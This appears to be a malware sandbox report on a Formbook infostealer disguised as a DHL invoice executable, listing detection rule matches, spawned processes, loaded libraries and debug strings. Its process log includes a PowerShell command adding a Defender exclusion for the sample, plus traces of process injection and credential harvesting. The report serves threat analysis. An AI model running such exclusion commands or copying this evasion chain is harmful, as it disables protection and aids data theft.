            Source: 0000000C.00000002.4140287170.0000000002670000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000004.00000002.2075245562.0000000005A60000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: dhl009544554961.INV.PEK.CO.041.20241115.183845.20241115.183948.34872.exe, 00000000.00000002.1853707801.000002B47C8DF000.00000004.00000020.00020000.00000000.sdmp, dhl009544554961.INV.PEK.CO.041.20241115.183845.20241115.183948.34872.exe, 00000000.00000002.1853707801.000002B47C840000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: f:\binaries\Intermediate\vb\microsoft.visualbasic.build.vbproj_731629843\objr\x86\Microsoft.VisualBasic.pdb
            Source: classification engineClassification label: mal100.troj.spyw.expl.evad.winEXE@14/11@15/8
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
            Source: C:\Windows\System32\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6540
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4940:120:WilError_03
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ugrcbpth.rpx.ps1Jump to behavior
            Source: dhl009544554961.INV.PEK.CO.041.20241115.183845.20241115.183948.34872.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: dhl009544554961.INV.PEK.CO.041.20241115.183845.20241115.183948.34872.exeStatic file information: TRID: Win64 Executable GUI Net Framework (217006/5) 49.88%
            Source: C:\Users\user\Desktop\dhl009544554961.INV.PEK.CO.041.20241115.183845.20241115.183948.34872.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
            Source: C:\Users\user\Desktop\dhl009544554961.INV.PEK.CO.041.20241115.183845.20241115.183948.34872.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: wextract.exe, 0000000D.00000003.2251440236.0000000000756000.00000004.00000020.00020000.00000000.sdmp, wextract.exe, 0000000D.00000003.2251440236.0000000000777000.00000004.00000020.00020000.00000000.sdmp, wextract.exe, 0000000D.00000003.2253445634.0000000000777000.00000004.00000020.00020000.00000000.sdmp, wextract.exe, 0000000D.00000002.4139514530.0000000000777000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
            Source: dhl009544554961.INV.PEK.CO.041.20241115.183845.20241115.183948.34872.exeReversingLabs: Detection: 47%
            Source: dhl009544554961.INV.PEK.CO.041.20241115.183845.20241115.183948.34872.exeVirustotal: Detection: 45%
            Source: C:\Users\user\Desktop\dhl009544554961.INV.PEK.CO.041.20241115.183845.20241115.183948.34872.exeFile read: C:\Users\user\Desktop\dhl009544554961.INV.PEK.CO.041.20241115.183845.20241115.183948.34872.exeJump to behavior
            Source: unknownProcess created: C:\Users\user\Desktop\dhl009544554961.INV.PEK.CO.041.20241115.183845.20241115.183948.34872.exe "C:\Users\user\Desktop\dhl009544554961.INV.PEK.CO.041.20241115.183845.20241115.183948.34872.exe"
            Source: C:\Users\user\Desktop\dhl009544554961.INV.PEK.CO.041.20241115.183845.20241115.183948.34872.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\dhl009544554961.INV.PEK.CO.041.20241115.183845.20241115.183948.34872.exe" -Force
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\dhl009544554961.INV.PEK.CO.041.20241115.183845.20241115.183948.34872.exeProcess created: C:\Windows\regedit.exe "C:\Windows\regedit.exe"
            Source: C:\Users\user\Desktop\dhl009544554961.INV.PEK.CO.041.20241115.183845.20241115.183948.34872.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"
            Source: C:\Users\user\Desktop\dhl009544554961.INV.PEK.CO.041.20241115.183845.20241115.183948.34872.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 6540 -s 1348
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
            Source: C:\Program Files (x86)\eHctiqUIHXMitvvYEbqHxdywRbuiEQngCgUQOsHexzsESgFy\rQkTBkrqhGpTBn.exeProcess created: C:\Windows\SysWOW64\wextract.exe "C:\Windows\SysWOW64\wextract.exe"
            Source: C:\Windows\SysWOW64\wextract.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
            Source: C:\Users\user\Desktop\dhl009544554961.INV.PEK.CO.041.20241115.183845.20241115.183948.34872.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\dhl009544554961.INV.PEK.CO.041.20241115.183845.20241115.183948.34872.exe" -ForceJump to behavior
            Source: C:\Users\user\Desktop\dhl009544554961.INV.PEK.CO.041.20241115.183845.20241115.183948.34872.exeProcess created: C:\Windows\regedit.exe "C:\Windows\regedit.exe"Jump to behavior
            Source: C:\Users\user\Desktop\dhl009544554961.INV.PEK.CO.041.20241115.183845.20241115.183948.34872.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"Jump to behavior
            Source: C:\Program Files (x86)\eHctiqUIHXMitvvYEbqHxdywRbuiEQngCgUQOsHexzsESgFy\rQkTBkrqhGpTBn.exeProcess created: C:\Windows\SysWOW64\wextract.exe "C:\Windows\SysWOW64\wextract.exe"Jump to behavior
            Source: C:\Windows\SysWOW64\wextract.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
            Source: C:\Users\user\Desktop\dhl009544554961.INV.PEK.CO.041.20241115.183845.20241115.183948.34872.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Users\user\Desktop\dhl009544554961.INV.PEK.CO.041.20241115.183845.20241115.183948.34872.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\Desktop\dhl009544554961.INV.PEK.CO.041.20241115.183845.20241115.183948.34872.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\dhl009544554961.INV.PEK.CO.041.20241115.183845.20241115.183948.34872.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\dhl009544554961.INV.PEK.CO.041.20241115.183845.20241115.183948.34872.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Users\user\Desktop\dhl009544554961.INV.PEK.CO.041.20241115.183845.20241115.183948.34872.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Users\user\Desktop\dhl009544554961.INV.PEK.CO.041.20241115.183845.20241115.183948.34872.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Users\user\Desktop\dhl009544554961.INV.PEK.CO.041.20241115.183845.20241115.183948.34872.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\dhl009544554961.INV.PEK.CO.041.20241115.183845.20241115.183948.34872.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\dhl009544554961.INV.PEK.CO.041.20241115.183845.20241115.183948.34872.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\dhl009544554961.INV.PEK.CO.041.20241115.183845.20241115.183948.34872.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\Desktop\dhl009544554961.INV.PEK.CO.041.20241115.183845.20241115.183948.34872.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Users\user\Desktop\dhl009544554961.INV.PEK.CO.041.20241115.183845.20241115.183948.34872.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Users\user\Desktop\dhl009544554961.INV.PEK.CO.041.20241115.183845.20241115.183948.34872.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\Desktop\dhl009544554961.INV.PEK.CO.041.20241115.183845.20241115.183948.34872.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\dhl009544554961.INV.PEK.CO.041.20241115.183845.20241115.183948.34872.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\Desktop\dhl009544554961.INV.PEK.CO.041.20241115.183845.20241115.183948.34872.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Users\user\Desktop\dhl009544554961.INV.PEK.CO.041.20241115.183845.20241115.183948.34872.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Users\user\Desktop\dhl009544554961.INV.PEK.CO.041.20241115.183845.20241115.183948.34872.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Users\user\Desktop\dhl009544554961.INV.PEK.CO.041.20241115.183845.20241115.183948.34872.exeSection loaded: edputil.dllJump to behavior
            Source: C:\Users\user\Desktop\dhl009544554961.INV.PEK.CO.041.20241115.183845.20241115.183948.34872.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Users\user\Desktop\dhl009544554961.INV.PEK.CO.041.20241115.183845.20241115.183948.34872.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Users\user\Desktop\dhl009544554961.INV.PEK.CO.041.20241115.183845.20241115.183948.34872.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Users\user\Desktop\dhl009544554961.INV.PEK.CO.041.20241115.183845.20241115.183948.34872.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Users\user\Desktop\dhl009544554961.INV.PEK.CO.041.20241115.183845.20241115.183948.34872.exeSection loaded: windows.staterepositoryps.dllJump to behavior
            Source: C:\Users\user\Desktop\dhl009544554961.INV.PEK.CO.041.20241115.183845.20241115.183948.34872.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\dhl009544554961.INV.PEK.CO.041.20241115.183845.20241115.183948.34872.exeSection loaded: appresolver.dllJump to behavior
            Source: C:\Users\user\Desktop\dhl009544554961.INV.PEK.CO.041.20241115.183845.20241115.183948.34872.exeSection loaded: bcp47langs.dllJump to behavior
            Source: C:\Users\user\Desktop\dhl009544554961.INV.PEK.CO.041.20241115.183845.20241115.183948.34872.exeSection loaded: slc.dllJump to behavior
            Source: C:\Users\user\Desktop\dhl009544554961.INV.PEK.CO.041.20241115.183845.20241115.183948.34872.exeSection loaded: sppc.dllJump to behavior
            Source: C:\Users\user\Desktop\dhl009544554961.INV.PEK.CO.041.20241115.183845.20241115.183948.34872.exeSection loaded: onecorecommonproxystub.dllJump to behavior
            Source: C:\Users\user\Desktop\dhl009544554961.INV.PEK.CO.041.20241115.183845.20241115.183948.34872.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: fastprox.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mpclient.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wmitomi.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mi.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\wextract.exeSection loaded: cabinet.dllJump to behavior
            Source: C:\Windows\SysWOW64\wextract.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\SysWOW64\wextract.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Windows\SysWOW64\wextract.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\wextract.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\SysWOW64\wextract.exeSection loaded: ieframe.dllJump to behavior
            Source: C:\Windows\SysWOW64\wextract.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\SysWOW64\wextract.exeSection loaded: netapi32.dllJump to behavior
            Source: C:\Windows\SysWOW64\wextract.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\SysWOW64\wextract.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Windows\SysWOW64\wextract.exeSection loaded: wkscli.dllJump to behavior
            Source: C:\Windows\SysWOW64\wextract.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\wextract.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\SysWOW64\wextract.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\SysWOW64\wextract.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\SysWOW64\wextract.exe | Section loaded: profapi.dll
            Source: C:\Windows\SysWOW64\wextract.exe | Section loaded: secur32.dll
            Source: C:\Windows\SysWOW64\wextract.exe | Section loaded: mlang.dll
            Source: C:\Windows\SysWOW64\wextract.exe | Section loaded: propsys.dll
            Source: C:\Windows\SysWOW64\wextract.exe | Section loaded: winsqlite3.dll
            Source: C:\Windows\SysWOW64\wextract.exe | Section loaded: vaultcli.dll
            Source: C:\Windows\SysWOW64\wextract.exe | Section loaded: wintypes.dll
            Source: C:\Windows\SysWOW64\wextract.exe | Section loaded: dpapi.dll
            Source: C:\Windows\SysWOW64\wextract.exe | Section loaded: cryptbase.dll
            Source: C:\Program Files (x86)\eHctiqUIHXMitvvYEbqHxdywRbuiEQngCgUQOsHexzsESgFy\rQkTBkrqhGpTBn.exe | Section loaded: wininet.dll
            Source: C:\Program Files (x86)\eHctiqUIHXMitvvYEbqHxdywRbuiEQngCgUQOsHexzsESgFy\rQkTBkrqhGpTBn.exe | Section loaded: mswsock.dll
            Source: C:\Program Files (x86)\eHctiqUIHXMitvvYEbqHxdywRbuiEQngCgUQOsHexzsESgFy\rQkTBkrqhGpTBn.exe | Section loaded: dnsapi.dll
            Source: C:\Program Files (x86)\eHctiqUIHXMitvvYEbqHxdywRbuiEQngCgUQOsHexzsESgFy\rQkTBkrqhGpTBn.exe | Section loaded: iphlpapi.dll
            Source: C:\Program Files (x86)\eHctiqUIHXMitvvYEbqHxdywRbuiEQngCgUQOsHexzsESgFy\rQkTBkrqhGpTBn.exe | Section loaded: fwpuclnt.dll
            Source: C:\Program Files (x86)\eHctiqUIHXMitvvYEbqHxdywRbuiEQngCgUQOsHexzsESgFy\rQkTBkrqhGpTBn.exe | Section loaded: rasadhlp.dll
            Source: C:\Users\user\Desktop\dhl009544554961.INV.PEK.CO.041.20241115.183845.20241115.183948.34872.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32
            Source: Window Recorder | Window detected: More than 3 window changes detected
            Source: C:\Users\user\Desktop\dhl009544554961.INV.PEK.CO.041.20241115.183845.20241115.183948.34872.exe | File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
            Source: C:\Windows\SysWOW64\wextract.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
            Source: dhl009544554961.INV.PEK.CO.041.20241115.183845.20241115.183948.34872.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
            Source: dhl009544554961.INV.PEK.CO.041.20241115.183845.20241115.183948.34872.exe | Static file information: File size 3359817 > 1048576
            Source: dhl009544554961.INV.PEK.CO.041.20241115.183845.20241115.183948.34872.exe | Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Source: dhl009544554961.INV.PEK.CO.041.20241115.183845.20241115.183948.34872.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
            Source: Binary string: C:\Windows\mscorlib.pdbpdblib.pdb source: dhl009544554961.INV.PEK.CO.041.20241115.183845.20241115.183948.34872.exe, 00000000.00000002.1853707801.000002B47C8F6000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: .pdbHJp source: dhl009544554961.INV.PEK.CO.041.20241115.183845.20241115.183948.34872.exe, 00000000.00000002.1846210334.000000F06B1F3000.00000004.00000010.00020000.00000000.sdmp
            Source: Binary string: wextract.pdb source: csc.exe, 00000004.00000002.2074916274.00000000052B8000.00000004.00000020.00020000.00000000.sdmp, rQkTBkrqhGpTBn.exe, 0000000C.00000002.4139831429.0000000000A08000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Windows\dll\mscorlib.pdb source: dhl009544554961.INV.PEK.CO.041.20241115.183845.20241115.183948.34872.exe, 00000000.00000002.1853707801.000002B47C8F6000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: System.Windows.Forms.ni.pdb source: WER21A5.tmp.dmp.7.dr
            Source: Binary string: \??\C:\Windows\symbols\dll\Microsoft.VisualBasic.pdb.0M source: dhl009544554961.INV.PEK.CO.041.20241115.183845.20241115.183948.34872.exe, 00000000.00000002.1853707801.000002B47C8F6000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: System.Drawing.ni.pdb source: WER21A5.tmp.dmp.7.dr
            Source: Binary string: wntdll.pdb source: csc.exe, csc.exe, 00000004.00000003.1984836157.00000000053B5000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000004.00000003.1986270313.0000000005569000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000004.00000002.2075036679.0000000005710000.00000040.00001000.00020000.00000000.sdmp, csc.exe, 00000004.00000002.2075036679.00000000058AE000.00000040.00001000.00020000.00000000.sdmp, wextract.exe, wextract.exe, 0000000D.00000003.2076822878.0000000004230000.00000004.00000020.00020000.00000000.sdmp, wextract.exe, 0000000D.00000003.2078180097.00000000043E1000.00000004.00000020.00020000.00000000.sdmp, wextract.exe, 0000000D.00000002.4140587066.0000000004590000.00000040.00001000.00020000.00000000.sdmp, wextract.exe, 0000000D.00000002.4140587066.000000000472E000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: dhl009544554961.INV.PEK.CO.041.20241115.183845.20241115.183948.34872.PDB405(z source: dhl009544554961.INV.PEK.CO.041.20241115.183845.20241115.183948.34872.exe, 00000000.00000002.1846210334.000000F06B1F3000.00000004.00000010.00020000.00000000.sdmp
            Source: Binary string: StrongNameFreeBufferStrongNameTokenFromPublicKeyStrongNameErrorInfo.PDBdiasymreader.dllDllGetClassObject%X%X%X%X%X%X%X%X%X%X%X.TMP0x%016I64xCSCalink.dll with IAlink3 source: wextract.exe, 0000000D.00000002.4141477691.0000000004C6C000.00000004.10000000.00040000.00000000.sdmp, wextract.exe, 0000000D.00000002.4140392586.0000000004237000.00000004.00000020.00020000.00000000.sdmp, rQkTBkrqhGpTBn.exe, 0000000E.00000000.2141501567.0000000002F2C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000F.00000002.2368705885.000000001EA9C000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: mscorlib.ni.pdbRSDS7^3l source: WER21A5.tmp.dmp.7.dr
            Source: Binary string: C:\Windows\Microsoft.VisualBasic.pdbpdbsic.pdb source: dhl009544554961.INV.PEK.CO.041.20241115.183845.20241115.183948.34872.exe, 00000000.00000002.1853707801.000002B47C8DF000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: System.Drawing.ni.pdbRSDS source: WER21A5.tmp.dmp.7.dr
            Source: Binary string: mscorlib.pdbh source: dhl009544554961.INV.PEK.CO.041.20241115.183845.20241115.183948.34872.exe, 00000000.00000002.1853707801.000002B47C840000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdbk source: dhl009544554961.INV.PEK.CO.041.20241115.183845.20241115.183948.34872.exe, 00000000.00000002.1853707801.000002B47C8F6000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Windows\Microsoft.VisualBasic.pdbh source: dhl009544554961.INV.PEK.CO.041.20241115.183845.20241115.183948.34872.exe, 00000000.00000002.1853707801.000002B47C8F6000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: csc.pdbF source: wextract.exe, 0000000D.00000002.4141477691.0000000004C6C000.00000004.10000000.00040000.00000000.sdmp, wextract.exe, 0000000D.00000002.4140392586.0000000004237000.00000004.00000020.00020000.00000000.sdmp, rQkTBkrqhGpTBn.exe, 0000000E.00000000.2141501567.0000000002F2C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000F.00000002.2368705885.000000001EA9C000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: System.Xml.ni.pdbRSDS# source: WER21A5.tmp.dmp.7.dr
            Source: Binary string: pC:\Users\user\Desktop\dhl009544554961.INV.PEK.CO.041.20241115.183845.20241115.183948.34872.PDB source: dhl009544554961.INV.PEK.CO.041.20241115.183845.20241115.183948.34872.exe, 00000000.00000002.1846210334.000000F06B1F3000.00000004.00000010.00020000.00000000.sdmp
            Source: Binary string: System.Core.ni.pdb source: WER21A5.tmp.dmp.7.dr
            Source: Binary string: Microsoft.VisualBasic.pdb source: WER21A5.tmp.dmp.7.dr
            Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: dhl009544554961.INV.PEK.CO.041.20241115.183845.20241115.183948.34872.exe, 00000000.00000002.1853707801.000002B47C8F6000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: System.Management.ni.pdbRSDSJ< source: WER21A5.tmp.dmp.7.dr
            Source: Binary string: System.Windows.Forms.ni.pdbRSDS source: WER21A5.tmp.dmp.7.dr
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: rQkTBkrqhGpTBn.exe, 0000000C.00000002.4139357076.00000000001EE000.00000002.00000001.01000000.00000009.sdmp, rQkTBkrqhGpTBn.exe, 0000000E.00000000.2140751546.00000000001EE000.00000002.00000001.01000000.00000009.sdmp
            Source: Binary string: mscorlib.ni.pdb source: WER21A5.tmp.dmp.7.dr
            Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.pdb source: dhl009544554961.INV.PEK.CO.041.20241115.183845.20241115.183948.34872.exe, 00000000.00000002.1853707801.000002B47C8F6000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Windows\mscorlib.pdb source: dhl009544554961.INV.PEK.CO.041.20241115.183845.20241115.183948.34872.exe, 00000000.00000002.1853707801.000002B47C8F6000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: System.Configuration.ni.pdbRSDScUN source: WER21A5.tmp.dmp.7.dr
